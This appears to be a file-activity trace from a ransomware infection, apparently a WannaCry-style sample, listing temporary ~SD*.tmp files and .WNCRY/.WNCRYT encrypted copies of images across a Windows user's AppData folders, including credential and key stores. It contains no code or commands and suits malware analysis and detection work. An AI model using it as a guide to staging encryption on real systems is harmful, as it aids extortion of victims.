C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW\~SD9CA.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\~SD9DB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\~SD9DC.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\~SD9DD.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\~SD9DE.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer\~SD9DF.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\~SD9E0.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\~SD9E1.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806\~SD9F2.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\~SD9F3.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\~SD9F4.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\~SD9F5.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291\~SD9F6.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\~SD9F7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\~SD9F8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\~SDA18.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Themes\~SDA77.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\~SDA87.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\~SDAC7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\~SDAF7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\~SDB26.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\~SDB37.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df\~SDB57.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4\~SDB68.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7\~SDB88.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2\~SDBB8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Live\~SDBD8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\~SDBD9.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\~SDBEA.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\~SDBEB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new\~SDC3A.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\~SDC7A.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Media\~SDEFB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\~SDEFC.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\~SDF6B.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\~SDF7B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\~SDF9B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\~SDFCB.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\~SDFFB.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\~SD102B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\~SD106B.tmp
C:\Users\user\AppData\Local\Mozilla\~SD108B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\~SD10DA.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\~SD10DB.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD10DC.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\~SD10ED.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed\~SD114B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries\~SD117B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\~SD11DA.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4\~SD1239.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache\~SD123A.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails\~SD1279.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD1299.tmp
C:\Users\user\AppData\Local\Package Cache\~SD12BA.tmp
C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}\~SD12EA.tmp
C:\Users\user\AppData\Local\pip\~SD130A.tmp
C:\Users\user\AppData\Local\pip\cache\~SD1359.tmp
C:\Users\user\AppData\Local\pip\cache\http\~SD136A.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\~SD1399.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\~SD13D9.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\~SD1428.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\~SD1448.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1\~SD14A7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\~SD14D7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\~SD14F7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\~SD1517.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\~SD1528.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e\~SD1539.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\~SD1578.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\~SD1598.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\~SD15B9.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\~SD15C9.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3\~SD15EA.tmp
C:\Users\user\AppData\Local\pip\cache\selfcheck\~SD160A.tmp
C:\Users\user\AppData\LocalLow\~SD163A.tmp
C:\Users\user\AppData\LocalLow\Adobe\~SD165A.tmp
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\~SD1699.tmp
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\~SD16F8.tmp
C:\Users\user\AppData\LocalLow\Adobe\Linguistics\~SD1747.tmp
C:\Users\user\AppData\LocalLow\Microsoft\~SD17A6.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\~SD17E6.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\~SD1883.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\~SD1910.tmp
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\~SD19BD.tmp
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\~SD19DE.tmp
C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage\~SD1A0D.tmp
C:\Users\user\AppData\LocalLow\Mozilla\~SD1A2E.tmp
C:\Users\user\AppData\LocalLow\Sun\~SD1A7D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\~SD1A9D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\~SD1ABD.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\~SD1AED.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\~SD1B6B.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\~SD1BBA.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\~SD1BDB.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\~SD1C39.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\~SD1C79.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\~SD1CD8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\~SD1CF8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\~SD1D37.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\~SD1D67.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\~SD1DB6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\~SD1DE6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\~SD1DF7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\~SD1E17.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\~SD1E37.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\~SD1E67.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\~SD1E87.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\~SD1ED7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\~SD1EE7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\~SD1F07.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\~SD1F28.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\~SD1F77.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\~SD1FA7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\~SD1FE6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\~SD2035.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\~SD2065.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\~SD2095.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\~SD20B5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\~SD20E5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\~SD2144.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\~SD2155.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\~SD2175.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\~SD21B4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\~SD21E4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\~SD21F5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\~SD2234.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\~SD2264.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\~SD2284.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\~SD2295.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\~SD2296.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\~SD22E5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\~SD22F6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\~SD2316.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\~SD2356.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\~SD2376.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\~SD2396.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\~SD23C6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\~SD2425.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\~SD2435.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\~SD2456.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\~SD24C4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\~SD24C5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\~SD24C6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\~SD2505.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\~SD2535.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\~SD2556.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\~SD2566.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\~SD2577.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\~SD2587.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\~SD25A8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\~SD25C8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\~SD25F8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\~SD2618.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\~SD2629.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\~SD262A.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\~SD262B.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\~SD262C.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\~SD262D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log\~SD262E.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security\~SD263E.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\~SD263F.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si\~SD2640.tmp
C:\Users\user\AppData\Roaming\~SD2641.tmp
C:\Users\user\AppData\Roaming\Adobe\~SD2652.tmp
C:\Users\user\AppData\Roaming\Adobe\Acrobat\~SD2653.tmp
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\~SD2654.tmp
C:\Users\user\AppData\Roaming\Adobe\Flash Player\~SD2655.tmp
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\~SD2656.tmp
C:\Users\user\AppData\Roaming\Adobe\Headlights\~SD2657.tmp
C:\Users\user\AppData\Roaming\Adobe\Linguistics\~SD2658.tmp
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\~SD2678.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\~SD2698.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\~SD26E8.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\~SD2746.tmp
C:\Users\user\AppData\Roaming\Identities\~SD27A5.tmp
C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\~SD2804.tmp
C:\Users\user\AppData\Roaming\Media Center Programs\~SD2834.tmp
C:\Users\user\AppData\Roaming\Microsoft\~SD2844.tmp
C:\Users\user\AppData\Roaming\Microsoft\AddIns\~SD2855.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\~SD2866.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\~SD2876.tmp
C:\Users\user\AppData\Roaming\Microsoft\Credentials\~SD2887.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\~SD28A7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\~SD28C7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD28E8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\~SD2908.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\~SD2909.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\~SD2929.tmp
C:\Users\user\AppData\Roaming\Microsoft\Excel\~SD2949.tmp
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\~SD2979.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\~SD29A9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SD29BA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\~SD29EA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\~SD29FA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\~SD2A2A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\~SD2A5A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\~SD2A7A.tmp
C:\Users\user\AppData\Roaming\Microsoft\MMC\~SD2AAA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\~SD2ADA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\~SD2B0A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Proof\~SD2B3A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Protect\~SD2B79.tmp
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD2BC8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Speech\~SD2C08.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\~SD2C38.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\~SD2C68.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\~SD2C88.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\~SD2CD7.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\~SD2CE8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\~SD2D17.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\~SD2D47.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\~SD2D96.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\~SD2DA7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\~SD2DD7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\~SD2E93.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\~SD2EA4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\~SD2EC4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\~SD2EE5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\~SD2EF5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\~SD2EF6.tmp
C:\Users\user\AppData\Roaming\Microsoft\UProof\~SD2EF7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Vault\~SD2EF8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\~SD2EF9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\~SD2F0C.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\~SD2F0D.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\~SD2F0E.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\~SD2F0F.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\~SD2F10.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\~SD2F20.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\~SD2F21.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\~SD2F22.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SD2F52.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SD2F63.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\~SD2F83.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\~SD2F94.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\~SD2FA4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\~SD2FB5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\~SD2FF5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\~SD3044.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\~SD3093.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD30C3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3102.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3132.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3162.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3182.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD31A2.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\~SD31D3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\~SD3203.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\~SD3233.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\~SD32C1.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Word\~SD331F.tmp
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\~SD3330.tmp
C:\Users\user\AppData\Roaming\Mozilla\~SD337F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Extensions\~SD33AF.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\~SD33DF.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\~SD340F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\~SD341F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\~SD3420.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\~SD3431.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD3432.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\~SD3443.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\~SD3444.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\~SD3445.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\~SD3446.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\~SD3447.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\~SD3457.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\~SD3458.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\~SD3459.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\~SD345A.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\~SD345B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\~SD347C.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\~SD348C.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\~SD348D.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\~SD348E.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\~SD348F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\~SD34A0.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\~SD34A1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\~SD34A2.tmp
